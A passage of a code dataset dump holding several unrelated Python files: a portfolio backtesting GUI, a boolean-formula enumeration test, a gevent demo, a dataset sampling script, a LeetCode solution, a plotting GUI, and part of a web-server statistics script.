categories.iat[2, i] == \"Energy\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n if Comm.get() == 1 :\n for i in range(1,135):\n if categories.iat[2, i] == \"Communication Services\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n if Health.get() == 1 :\n for i in range(1,135):\n if categories.iat[2, i] == \"Healthcare\":\n if categories.iat[0,i] not in tickersInd :\n tickersInd.append(categories.iat[0,i])\n print(tickersInd)\n\n\n\n\n if usa.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"USA\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if ger.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"GER\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if chn.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"CHN\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if ire.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"IRE\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if nl.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"NL\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if jpn.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"JPN\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if india.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"IN\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if isr.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"ISR\":\n if 
categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n if ca.get() == 1 :\n for i in range(1,135):\n if categories.iat[1, i] == \"CA\":\n if categories.iat[0,i] in tickersInd :\n tickersCoun.append(categories.iat[0,i])\n print(tickersCoun)\n\n\n\n\n if lc.get() == 1 :\n for i in range(1,135):\n if categories.iat[3, i] == \"Large Cap\":\n if categories.iat[0,i] in tickersCoun :\n tickersCap.append(categories.iat[0,i])\n print(tickersCap)\n\n if mc.get() == 1 :\n for i in range(1,135):\n if categories.iat[3, i] == \"Medium Cap\":\n if categories.iat[0,i] in tickersCoun :\n tickersCap.append(categories.iat[0,i])\n print(tickersCap)\n\n if sc.get() == 1 :\n for i in range(1,135):\n if categories.iat[3, i] == \"Small Cap\":\n if categories.iat[0,i] in tickersCoun :\n tickersCap.append(categories.iat[0,i])\n print(tickersCap)\n\n\n\n if before.get() == 1 :\n startDate.append('2000-01-01')\n endDate.append('2006-12-31')\n print(startDate)\n print(endDate)\n\n if during.get() == 1 :\n startDate.append('2007-01-01')\n endDate.append('2008-12-31')\n print(startDate)\n print(endDate)\n \n if after.get() == 1 :\n startDate.append('2009-01-01')\n endDate.append('2019-12-08')\n print(startDate)\n print(endDate)\n\n\n\ntk.Button(root, text='Quit', command=root.quit).grid(row=9, column=0)\ntk.Button(root, text='Edit', command=csvedit).grid(row=8, column=0)\n\nprint(tickersInd)\nprint(tickersCoun)\nprint(startDate)\nprint(endDate)\nroot.mainloop()\n\n\n#Optimised portfolio\n###################################################################\n\ndata = bt.get(tickersCap, start='2015-01-01')\n\nreturns = expected_returns.returns_from_prices(data)\nreturns.to_excel(\"returns.xlsx\")\n\n\n# Calculate expected returns and sample covariance\nmu = expected_returns.mean_historical_return(data)\nS = risk_models.sample_cov(data)\n\n# Optimise for maximal Sharpe ratio\nef = EfficientFrontier(mu, S)\nraw_weights = ef.max_sharpe()\ncleaned_weights 
= ef.clean_weights()\n\nprint(cleaned_weights)\nef.portfolio_performance(verbose=True)\n\n\nlatest_prices = get_latest_prices(data)\n\nda = DiscreteAllocation(cleaned_weights, latest_prices, total_portfolio_value=10000)\nallocation, leftover = da.lp_portfolio()\nprint(\"Discrete allocation:\", allocation)\nprint(\"Funds remaining: ${:.2f}\".format(leftover))\n\nprint(data)\n\n\n\n#SMA strategy\n##################################################\n\n\nclass SelectWhere(bt.Algo):\n\n \"\"\"\n Selects securities based on an indicator DataFrame.\n\n Selects securities where the value is True on the current date (target.now).\n\n Args:\n * signal (DataFrame): DataFrame containing the signal (boolean DataFrame)\n\n Sets:\n * selected\n\n \"\"\"\n def __init__(self, signal):\n self.signal = signal\n\n def __call__(self, target):\n # get signal on target.now\n if target.now in self.signal.index:\n sig = self.signal.ix[target.now]\n\n # get indices where true as list\n selected = list(sig.index[sig])\n\n # save in temp - this will be used by the weighing algo\n target.temp['selected'] = selected\n\n # return True because we want to keep on moving down the stack\n return True\n\n\n\n# simple backtest to test long-only allocation\ndef long_only_ew(tickers, start='2015-01-01', name='long_only_ew'):\n s = bt.Strategy(name, [bt.algos.RunOnce(),\n bt.algos.SelectAll(),\n bt.algos.WeighEqually(),\n bt.algos.Rebalance()])\n data1 = bt.get(tickers, start=start)\n return bt.Backtest(s, data1)\n\n\n# create the backtests\nbenchmark = long_only_ew('^GSPC', name='S&P500')\n\n\n#setting rfr\nriskfree = bt.get('^IRX', start='2015-01-01')\nriskfree_rate = riskfree.mean() / 100\nprint(riskfree_rate)\n\ntype(riskfree_rate)\n\nriskfree_rate = float(riskfree_rate)\ntype(riskfree_rate)\n\n\n\n#Strategy 2 - MA Cross\n################################################ \n\n\nclass WeighTarget(bt.Algo):\n \"\"\"\n Sets target weights based on a target weight DataFrame.\n\n Args:\n * target_weights 
(DataFrame): DataFrame containing the target weights\n\n Sets:\n * weights\n\n \"\"\"\n\n def __init__(self, target_weights):\n self.tw = target_weights\n\n def __call__(self, target):\n # get target weights on date target.now\n if target.now in self.tw.index:\n w = self.tw.ix[target.now]\n\n # save in temp - this will be used by the weighing algo\n # also dropping any na's just in case they pop up\n target.temp['weights'] = w.dropna()\n\n # return True because we want to keep on moving down the stack\n return True\n \n \n## download some data & calc SMAs\nsma50 = data.rolling(50).mean()\nsma200 = data.rolling(200).mean()\n\n\n\n## now we need to calculate our target weight DataFrame\n# first we will copy the sma200 DataFrame since our weights will have the same strucutre\ntw = sma200.copy()\n\n# set appropriate target weights\ntw[sma50 > sma200] = (1/len(data.columns))\ntw[sma50 <= sma200] = -(1/len(data.columns))\n\n# here we will set the weight to 0 - this is because the sma200 needs 200 data points before\n# calculating its first point. 
Therefore, it will start with a bunch of nulls (NaNs).\ntw[sma200.isnull()] = 0.0\n\n# Now set up the MA_cross strategy for our moving average cross strategy\nMA_cross = bt.Strategy('MA_cross', [bt.algos.WeighTarget(tw),\n bt.algos.Rebalance()])\n\ntest_MA = bt.Backtest(MA_cross, data)\nres_MA = bt.run(test_MA)\n\n\n# Plot security weights to test logic\n# Note we expect a picture with immediate jumps between 0.2 and -0.2 \n#res_MA.plot_security_weights()\n\n# Plot the Equity curve\n#res_MA.plot()\n\n# Show the computed results\nres_MA.set_riskfree_rate(riskfree_rate)\n\n\n#strategy - Inverse portfolio\n#####################################################\ns_inv = bt.Strategy('Inverse of Volatility', \n [bt.algos.RunMonthly(),\n bt.algos.SelectAll(),\n bt.algos.WeighInvVol(),\n bt.algos.Rebalance()])\n\nb_inv = bt.Backtest(s_inv, data)\n\n\nres_inv = bt.run(b_inv)\nres_inv.plot_security_weights()\n\n# Plot security weights to test logic\n# Note we expect a picture with immediate jumps between 0.2 and -0.2 \n#res_MA.plot_security_weights()\n\n#strategy - Random 10\n#####################################################\ns_random = bt.Strategy('Random 10', \n [bt.algos.RunMonthly(),\n bt.algos.SelectRandomly(n=10),\n bt.algos.WeighRandomly(),\n bt.algos.Rebalance()])\n\nb_random = bt.Backtest(s_random, data)\n\n# run all the backtests!\n#res2.set_riskfree_rate(riskfree_rate)\n\n#res2.plot(freq='m')\n#res2.display()\n\nresult = bt.run(test_MA, b_inv, b_random, benchmark)\nresult.set_riskfree_rate(riskfree_rate)\nresult.plot()\nresult.display()\nresults_key = result.stats.assign()\nresults_key.to_excel(\"Demonstration.xlsx\")","sub_path":"Demonstration.py","file_name":"Demonstration.py","file_ext":"py","file_size_in_byte":14340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"573391801","text":"\nNode = dict\nLeaf = str\n\n\ndef formulas(n):\n if n <= 0:\n []\n elif n == 1:\n return ['True', 'False']\n else:\n fs 
= formulas(n-1)\n fsN = []\n fsN += [{'Not':[f]} for f in fs]\n fsN += [{'And':[f1,f2]} for f1 in fs for f2 in fs]\n fsN += [{'Or':[f1,f2]} for f1 in fs for f2 in fs]\n return fs + fsN\n\ndef metric(f):\n if type(f) == Leaf:\n\n return 1\n if type(f) == Node:\n print(\"f: \" + str(f))\n print(\"==================\")\n for label in f:\n print(\"label: \" + str(label))\n print(\"f[label]: \" + str(f[label]))\n # print(\"metric[child]: \" + str(metric(child) for child in f[label]))\n print(\"max([metric(child) for child in f[label]]): \" + str(1) + \" =? \" + str(max([metric(child) for child in f[label]])))\n print(1+ int( max([metric(child) for child in f[label]])))\n print(\"-----------------------------------------\")\n return 1 + max([metric(child) for child in f[label]])\n\ndef formulasHelper(n):\n ret = formulas(n)\n for f in formulas(n-1):\n ret.remove(f)\n return ret\n\ndef metricTest(f):\n for x in f:\n print(metric(x))\n\nmetricTest(formulasHelper(2))\n\ndef test(i):\n for f in formulas(i):\n print(\"formulas: \" + str(metric(a)))\n\n\n if metric(a) != i:\n return False\n return True\n\n# print(test(2))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"midterm/bound_exaustive_test.py","file_name":"bound_exaustive_test.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"466433587","text":"import gevent \n\ndef foo():\n print(\"Running in foo\")\n gevent.sleep(2)\n print(\"switch to foo again\")\n\ndef bar():\n print(\"Running in bar\")\n gevent.sleep(3)\n print(\"switch to bar again\")\n\n#将两个函数设置为协成,此时协成函数运行\nf = gevent.spawn(foo)\nb = gevent.spawn(bar)\n\n#回收协成\ngevent.joinall([f,b])\n","sub_path":"word/第二阶段/第二阶段小项目/day9/gevent_test.py","file_name":"gevent_test.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"507342945","text":"# encoding:utf-8\nimport pandas as 
pd\nimport numpy as np\nimport time\nimport datetime\n\n# sampling:\n# (1)把train.csv打乱,取4250w的数据\n# (2)把4250w的数据按时间排序,认为最后600w为\"高质量数据\"\n# (3)把最后600w打乱,再分为3部分:100w + 250w(dev set) + 250w(test set)\n# (4)故最终结果:\n# train set:3650w + 100w = 3750w\n# dev set:250w\n# test set:250w\n\n# TODO: fix the size of data\n# set_size = np.array([3750, 250, 250])\n\nstart_time = time.time()\npath = '../../data/'\n\n\ndef time_description(op):\n print(\"成功处理 %s ,累计用时 %f s\" % (op, (time.time() - start_time)))\n print()\n\n\ndef handle_operation(op):\n print(\"当前时间为:%s,正在处理%s...\" % (datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'), op))\n\n\noperation = \"train.csv\"\nhandle_operation(operation)\ndf = pd.read_csv(path + operation)\ntime_description(operation)\n\n# sampling\noperation = \"sample_df\"\nhandle_operation(operation)\nsample_df = df.sample(n=42500000)\ntime_description(operation)\n\n# sorted\noperation = \"sorted_df\"\nhandle_operation(operation)\nsorted_df = sample_df.sort_values(by='click_time')\ntime_description(operation)\n\n# train, dev, test - df\nlen_sample = len(sorted_df)\nhigh_quality_df = sorted_df[(len_sample - 6000000):len_sample].sample(frac=1)\nhigh_quality_train = high_quality_df[:1000000]\ndev_df = high_quality_df[len(high_quality_train):(len(high_quality_train) + 2500000)]\ntest_df = high_quality_df[(len(high_quality_train) + len(dev_df)):]\ntrain_df = sorted_df[:36500000].append(high_quality_train)\n\n# dev-output\noperation = 'dev_250w.csv'\nhandle_operation(operation)\ndev_df.to_csv(path + operation)\ntime_description(operation)\n\n# test-output\noperation = 'test_250w.csv'\nhandle_operation(operation)\ntest_df.to_csv(path + operation)\ntime_description(operation)\n\n# train-output\noperation = 'train_3750w.csv'\nhandle_operation(operation)\ntrain_df.to_csv(path + operation)\ntime_description(operation)\n\n# data_shuffled-output\noperation = 'data_shuffled_4250w.csv'\nhandle_operation(operation)\nsample_df.to_csv(path + 
operation)\ntime_description(operation)\n\n'''\n/home/stu/.conda/envs/deep/bin/python /home/stu/Projects/Thdlee.Snow/TalkingData/preprocess/dataset/sampling.py\n当前时间为:2018-05-01 16:45:30,正在处理train.csv...\n成功处理 train.csv ,累计用时 233.386754 s\n\n当前时间为:2018-05-01 16:49:23,正在处理sample_df...\n成功处理 sample_df ,累计用时 258.572500 s\n\n当前时间为:2018-05-01 16:49:48,正在处理sorted_df...\n成功处理 sorted_df ,累计用时 339.554489 s\n\n当前时间为:2018-05-01 16:51:14,正在处理dev_250w.csv...\n成功处理 dev_250w.csv ,累计用时 357.362650 s\n\n当前时间为:2018-05-01 16:51:27,正在处理test_250w.csv...\n成功处理 test_250w.csv ,累计用时 370.246952 s\n\n当前时间为:2018-05-01 16:51:40,正在处理train_3750w.csv...\n成功处理 train_3750w.csv ,累计用时 554.877350 s\n\n当前时间为:2018-05-01 16:54:44,正在处理data_shuffled_4250w.csv...\n成功处理 data_shuffled_4250w.csv ,累计用时 776.042315 s\n\n\nProcess finished with exit code 0\n'''\n","sub_path":"preprocess/dataset/sampling.py","file_name":"sampling.py","file_ext":"py","file_size_in_byte":3165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"615397673","text":"from typing import List\n\n\"\"\"\nhttps://leetcode.com/problems/combination-sum\n\"\"\"\n\n\nclass Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n \n results = []\n \n def dfs(cand_list, buffer):\n \n cand_sum = sum(buffer)\n \n if cand_sum == target:\n results.append(buffer)\n return\n elif cand_sum > target:\n return\n \n for idx, cand in enumerate(cand_list):\n dfs(cand_list[idx:], buffer + [cand])\n \n dfs(candidates, [])\n \n return results\n","sub_path":"archive-dhkim/leetcode/ch12_graph/prob36_combination_sum.py","file_name":"prob36_combination_sum.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"629786861","text":"from tkinter import *\nimport matplotlib\nmatplotlib.use('TkAgg')\n\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport matplotlib.pyplot 
as plt\n\nfrom bayes import gen_plot\n\nW_WIDTH = 900\nW_HEIGHT = 900\n\ndef print_gen_params(rho, n):\n print('rho',rho.get())\n print('n', n.get())\n\ndef main():\n root = Tk()\n root.title('Figure 1')\n root.protocol('WM_DELETE_WINDOW', lambda: root.quit()) # обработчик закрытия окна\n root.resizable(False, False)\n\n rho_label = Label(root, text='Choose the rho (gen goodness)')\n rho_scale = Scale(root, orient=HORIZONTAL, length=W_WIDTH-100, from_=0, to=1, tickinterval=0.1, resolution=0.1)\n rho_scale.set(0.9)\n rho_label.grid(row=0, column=0, columnspan=2)\n rho_scale.grid(row=1, column=0, columnspan=2)\n\n n_label = Label(root, text='Choose the signal length')\n n_scale = Scale(root, orient=HORIZONTAL, length=W_WIDTH-100, from_=0, to=100, tickinterval=10, resolution=1)\n n_scale.set(80)\n n_label.grid(row=2, column=0, columnspan=2)\n n_scale.grid(row=3, column=0, columnspan=2)\n\n delta1_label = Label(root, text='Choose the small delta')\n delta1_scale = Scale(root, orient=HORIZONTAL, length=(W_WIDTH-100)/2, from_=0, to=1, tickinterval=0.1, resolution=0.05)\n delta1_scale.set(0.9)\n delta1_label.grid(row=4, column=0, columnspan=1)\n delta1_scale.grid(row=5, column=0, columnspan=1)\n delta2_label = Label(root, text='Choose the big delta')\n delta2_scale = Scale(root, orient=HORIZONTAL, length=(W_WIDTH-100)/2, from_=0, to=1, tickinterval=0.1, resolution=0.05)\n delta2_scale.set(0.9)\n delta2_label.grid(row=4, column=1, columnspan=1)\n delta2_scale.grid(row=5, column=1, columnspan=1)\n\n count_label = Label(root, text='Choose the count of signals')\n count_scale = Scale(root, orient=HORIZONTAL, length=W_WIDTH-100, from_=10, to=3000, tickinterval=300, resolution=1)\n count_scale.set(3000)\n count_label.grid(row=6, column=0, columnspan=2)\n count_scale.grid(row=7, column=0, columnspan=2)\n\n res_label = Label(root, text='')\n res_label.grid(row=7, column=2)\n\n lamd = 
lambda:gen_plot(rho_scale.get(),n_scale.get(),fig,delta1_scale.get(),delta2_scale.get(),count_scale.get(), res_label)\n\n fig = plt.figure(1, figsize=(10,6))\n canvas = FigureCanvasTkAgg(fig, master=root)\n plot_widget = canvas.get_tk_widget()\n plot_widget.grid(row=0, column=2, rowspan=6)\n button2 = Button(root, text='Generate', command=lamd)\n button2.grid(row=6, column=2)\n\n root.bind(\"\", lambda ev: lamd())\n root.mainloop()\n\n\nif __name__ == '__main__':\n main()","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225341198","text":"#!/usr/bin/env python\n\"\"\"Run server statistics\"\"\"\n\nimport sys\nimport os\nimport argparse\nimport fcntl\nimport time\nfrom geoip import geolite2\nimport pycountry\nimport numpy\nimport sqlite3\n\nfrom libpredweb import myfunc\nfrom libpredweb import webserver_common as webcom\nfrom libpredweb import dataprocess\n\nprogname = os.path.basename(sys.argv[0])\nrootname_progname = os.path.splitext(progname)[0]\n\n\ndef run_statistics(g_params): # {{{\n \"\"\"Server usage analysis\"\"\"\n name_server = g_params['name_server']\n gen_logfile = g_params['gen_logfile']\n gen_errfile = g_params['gen_errfile']\n webserver_root = g_params['webserver_root']\n run_statistics_basic(webserver_root, gen_logfile, gen_errfile)\n if name_server.lower() == \"topcons2\":\n run_statistics_topcons2(webserver_root, gen_logfile, gen_errfile)\n return 0\n# }}}\n\n\ndef run_statistics_basic(webserver_root, gen_logfile, gen_errfile): # {{{\n \"\"\"Function for qd_fe to run usage statistics for the web-server usage\n \"\"\"\n path_static = os.path.join(webserver_root, \"proj\", \"pred\", \"static\")\n path_log = os.path.join(path_static, 'log')\n path_result = os.path.join(path_static, 'result')\n path_stat = os.path.join(path_log, 'stat')\n binpath_plot = os.path.join(webserver_root, \"env\", \"bin\")\n\n # 1. 
calculate average running time, only for those sequences with time.txt\n # show also runtime of type and runtime -vs- seqlength\n webcom.loginfo(\"Run basic usage statistics...\\n\", gen_logfile)\n allfinishedjoblogfile = f\"{path_log}/all_finished_job.log\"\n runtimelogfile = f\"{path_log}/jobruntime.log\"\n runtimelogfile_finishedjobid = f\"{path_log}/jobruntime_finishedjobid.log\"\n allsubmitjoblogfile = f\"{path_log}/all_submitted_seq.log\"\n if not os.path.exists(path_stat):\n os.mkdir(path_stat)\n\n allfinishedjobidlist = myfunc.ReadIDList2(allfinishedjoblogfile,\n col=0, delim=\"\\t\")\n runtime_finishedjobidlist = myfunc.ReadIDList(runtimelogfile_finishedjobid)\n toana_jobidlist = list(set(allfinishedjobidlist) -\n set(runtime_finishedjobidlist))\n\n db_allfinished = f\"{path_log}/all_finished_job.sqlite3\"\n db_allsubmitted = f\"{path_log}/all_submitted_job.sqlite3\"\n sql_tablename = \"data\"\n\n for jobid in toana_jobidlist:\n runtimeloginfolist = []\n rstdir = \"%s/%s\" % (path_result, jobid)\n outpath_result = \"%s/%s\" % (rstdir, jobid)\n finished_seq_file = \"%s/finished_seqs.txt\" % (outpath_result)\n lines = []\n if os.path.exists(finished_seq_file):\n lines = myfunc.ReadFile(finished_seq_file).split(\"\\n\")\n for line in lines:\n strs = line.split(\"\\t\")\n if len(strs) >= 7:\n str_seqlen = strs[1]\n str_numTM = strs[2]\n str_isHasSP = strs[3]\n source = strs[4]\n if source == \"newrun\":\n subfolder = strs[0]\n timefile = f\"{outpath_result}/{subfolder}/time.txt\"\n if (os.path.exists(timefile)\n and os.path.getsize(timefile) > 0):\n txt = myfunc.ReadFile(timefile).strip()\n try:\n ss2 = txt.split(\";\")\n runtime_str = ss2[1]\n database_mode = ss2[2]\n runtimeloginfolist.append(\"\\t\".join(\n [\n jobid, subfolder,\n source, runtime_str, database_mode,\n str_seqlen,\n str_numTM, str_isHasSP\n ]))\n except IndexError:\n sys.stderr.write(\"bad timefile %s\\n\" % (timefile))\n\n if runtimeloginfolist:\n # items for the elelment of the list\n # 
jobid, seq_no, newrun_or_cached, runtime,\n # mtd_profile, seqlen, numTM, iShasSP\n myfunc.WriteFile(\"\\n\".join(runtimeloginfolist)+\"\\n\",\n runtimelogfile, \"a\", True)\n myfunc.WriteFile(jobid+\"\\n\", runtimelogfile_finishedjobid, \"a\", True)\n\n# 2. get numseq_in_job vs count_of_jobs, logscale in x-axis\n# get numseq_in_job vs waiting time (time_start - time_submit)\n# get numseq_in_job vs finish time (time_finish - time_submit)\n\n allfinished_job_dict = myfunc.ReadFinishedJobLog(allfinishedjoblogfile)\n countjob_country = {} # ['country'] = [numseq, numjob, ip_set]\n outfile_numseqjob = f\"{path_stat}/numseq_of_job.stat.txt\"\n outfile_numseqjob_web = f\"{path_stat}/numseq_of_job.web.stat.txt\"\n outfile_numseqjob_wsdl = f\"{path_stat}/numseq_of_job.wsdl.stat.txt\"\n countjob_numseq_dict = {} # count the number jobs for each numseq\n countjob_numseq_dict_web = {} # numJob for each numseq submitted via web\n countjob_numseq_dict_wsdl = {} # numJob for each numseq submitted via wsdl\n\n waittime_numseq_dict = {}\n waittime_numseq_dict_web = {}\n waittime_numseq_dict_wsdl = {}\n\n finishtime_numseq_dict = {}\n finishtime_numseq_dict_web = {}\n finishtime_numseq_dict_wsdl = {}\n\n con_f = sqlite3.connect(db_allfinished)\n cur_f = con_f.cursor()\n myfunc.CreateSQLiteTableAllFinished(cur_f, tablename=sql_tablename)\n cur_f.execute('BEGIN;')\n\n webcom.loginfo(\"create all finished sql db...\\n\", gen_logfile)\n for jobid in allfinished_job_dict:\n li = allfinished_job_dict[jobid]\n numseq = -1\n try:\n numseq = int(li[4])\n except (IndexError, ValueError):\n pass\n try:\n method_submission = li[5]\n except IndexError:\n method_submission = \"\"\n\n ip = \"\"\n try:\n ip = li[2]\n except IndexError:\n pass\n\n country = \"N/A\" # this is slow\n try:\n match = geolite2.lookup(ip)\n country = pycountry.countries.get(alpha_2=match.country).name\n except Exception: # pylint: disable=broad-except\n pass\n if country != \"N/A\":\n if country not in 
countjob_country:\n # [numseq, numjob, ip_set]\n countjob_country[country] = [0, 0, set([])]\n if numseq != -1:\n countjob_country[country][0] += numseq\n countjob_country[country][1] += 1\n countjob_country[country][2].add(ip)\n\n submit_date_str = li[6]\n start_date_str = li[7]\n finish_date_str = li[8]\n\n # Write SQL for allfinished{{{\n row = {}\n row['jobid'] = jobid\n row['status'] = li[0]\n row['jobname'] = li[1]\n row['email'] = li[3]\n row['ip'] = ip\n row['country'] = country\n row['method_submission'] = method_submission\n row['numseq'] = numseq\n row['submit_date'] = submit_date_str\n row['start_date'] = start_date_str\n row['finish_date'] = finish_date_str\n myfunc.WriteSQLiteAllFinished(cur_f, tablename=sql_tablename,\n data=[row])\n# }}}\n\n if numseq != -1:\n if numseq not in countjob_numseq_dict:\n countjob_numseq_dict[numseq] = 0\n countjob_numseq_dict[numseq] += 1\n if method_submission == \"web\":\n if numseq not in countjob_numseq_dict_web:\n countjob_numseq_dict_web[numseq] = 0\n countjob_numseq_dict_web[numseq] += 1\n if method_submission == \"wsdl\":\n if numseq not in countjob_numseq_dict_wsdl:\n countjob_numseq_dict_wsdl[numseq] = 0\n countjob_numseq_dict_wsdl[numseq] += 1\n\n# # calculate waittime and finishtime\n is_valid_submit_date = True\n is_valid_start_date = True\n is_valid_finish_date = True\n try:\n submit_date = webcom.datetime_str_to_time(submit_date_str)\n except ValueError:\n is_valid_submit_date = False\n try:\n start_date = webcom.datetime_str_to_time(start_date_str)\n except ValueError:\n is_valid_start_date = False\n try:\n finish_date = webcom.datetime_str_to_time(finish_date_str)\n except ValueError:\n is_valid_finish_date = False\n\n if is_valid_submit_date and is_valid_start_date:\n waittime_sec = (start_date - submit_date).total_seconds()\n if numseq not in waittime_numseq_dict:\n waittime_numseq_dict[numseq] = []\n waittime_numseq_dict[numseq].append(waittime_sec)\n if method_submission == \"web\":\n if numseq not 
in waittime_numseq_dict_web:\n waittime_numseq_dict_web[numseq] = []\n waittime_numseq_dict_web[numseq].append(waittime_sec)\n if method_submission == \"wsdl\":\n if numseq not in waittime_numseq_dict_wsdl:\n waittime_numseq_dict_wsdl[numseq] = []\n waittime_numseq_dict_wsdl[numseq].append(waittime_sec)\n if is_valid_submit_date and is_valid_finish_date:\n finishtime_sec = (finish_date - submit_date).total_seconds()\n if numseq not in finishtime_numseq_dict:\n finishtime_numseq_dict[numseq] = []\n finishtime_numseq_dict[numseq].append(finishtime_sec)\n if method_submission == \"web\":\n if numseq not in finishtime_numseq_dict_web:\n finishtime_numseq_dict_web[numseq] = []\n finishtime_numseq_dict_web[numseq].append(finishtime_sec)\n if method_submission == \"wsdl\":\n if numseq not in finishtime_numseq_dict_wsdl:\n finishtime_numseq_dict_wsdl[numseq] = []\n finishtime_numseq_dict_wsdl[numseq].append(finishtime_sec)\n\n con_f.commit()\n con_f.close()\n\n # output countjob by country\n outfile_countjob_by_country = f\"{path_stat}/countjob_by_country.txt\"\n # sort by numseq in descending order\n li_countjob = sorted(list(countjob_country.items()),\n key=lambda x: x[1][0], reverse=True)\n li_str = []\n li_str.append(\"#Country\\tNumSeq\\tNumJob\\tNumIP\")\n for li in li_countjob:\n li_str.append(\"%s\\t%d\\t%d\\t%d\" % (li[0], li[1][0], li[1][1], len(li[1][2])))\n myfunc.WriteFile((\"\\n\".join(li_str)+\"\\n\").encode('utf-8'),\n outfile_countjob_by_country, \"wb\", True)\n\n flist = [outfile_numseqjob,\n outfile_numseqjob_web,\n outfile_numseqjob_wsdl]\n dictlist = [countjob_numseq_dict,\n countjob_numseq_dict_web,\n countjob_numseq_dict_wsdl]\n for i, outfile in enumerate(flist):\n dt = dictlist[i]\n sortedlist = sorted(list(dt.items()), key=lambda x: x[0])\n try:\n fpout = open(outfile, \"w\")\n fpout.write(\"%s\\t%s\\n\" % ('numseq', 'count'))\n for j in range(len(sortedlist)):\n nseq = sortedlist[j][0]\n count = sortedlist[j][1]\n fpout.write(\"%d\\t%d\\n\" % 
(nseq, count))\n fpout.close()\n # plotting\n if os.path.exists(outfile) and sortedlist:\n cmd = [f\"{binpath_plot}/plot_numseq_of_job.sh\", outfile]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n except IOError:\n continue\n cmd = [f\"{binpath_plot}/plot_numseq_of_job_mtp.sh\",\n \"-web\", outfile_numseqjob_web,\n \"-wsdl\", outfile_numseqjob_wsdl]\n webcom.RunCmd(cmd, gen_logfile, gen_errfile)\n\n# 5. output num-submission time series with different bins\n# (day, week, month, year)\n con_s = sqlite3.connect(db_allsubmitted)\n cur_s = con_s.cursor()\n myfunc.CreateSQLiteTableAllSubmitted(cur_s, tablename=sql_tablename)\n cur_s.execute('BEGIN;')\n\n webcom.loginfo(\"create all submitted sql db...\\n\", gen_logfile)\n hdl = myfunc.ReadLineByBlock(allsubmitjoblogfile)\n # [\"name\" numjob, numseq, numjob_web, numseq_web,numjob_wsdl, numseq_wsdl]\n dict_submit_day = {}\n dict_submit_week = {}\n dict_submit_month = {}\n dict_submit_year = {}\n if not hdl.failure:\n lines = hdl.readlines()\n while lines is not None:\n for line in lines:\n strs = line.split(\"\\t\")\n if len(strs) < 8:\n continue\n submit_date_str = strs[0]\n numseq = 0\n try:\n numseq = int(strs[3])\n except (IndexError, ValueError):\n pass\n method_submission = strs[7]\n is_valid_submit_date = True\n try:\n submit_date = webcom.datetime_str_to_time(submit_date_str)\n except ValueError:\n is_valid_submit_date = False\n if is_valid_submit_date: # {{{\n day_str = submit_date_str.split()[0]\n (beginning_of_week, end_of_week) = myfunc.week_beg_end(submit_date)\n week_str = beginning_of_week.strftime(\"%Y-%m-%d\")\n month_str = submit_date.replace(day=1).strftime(\"%Y-%m-%d\")\n year_str = submit_date.replace(month=1, day=1).strftime(\"%Y-%m-%d\")\n day = int(day_str.replace(\"-\", \"\"))\n week = int(submit_date.strftime(\"%Y%V\"))\n month = int(submit_date.strftime(\"%Y%m\"))\n year = int(submit_date.year)\n if day not in dict_submit_day:\n # all web wsdl\n dict_submit_day[day] = [day_str] + 6*[0]\n if 
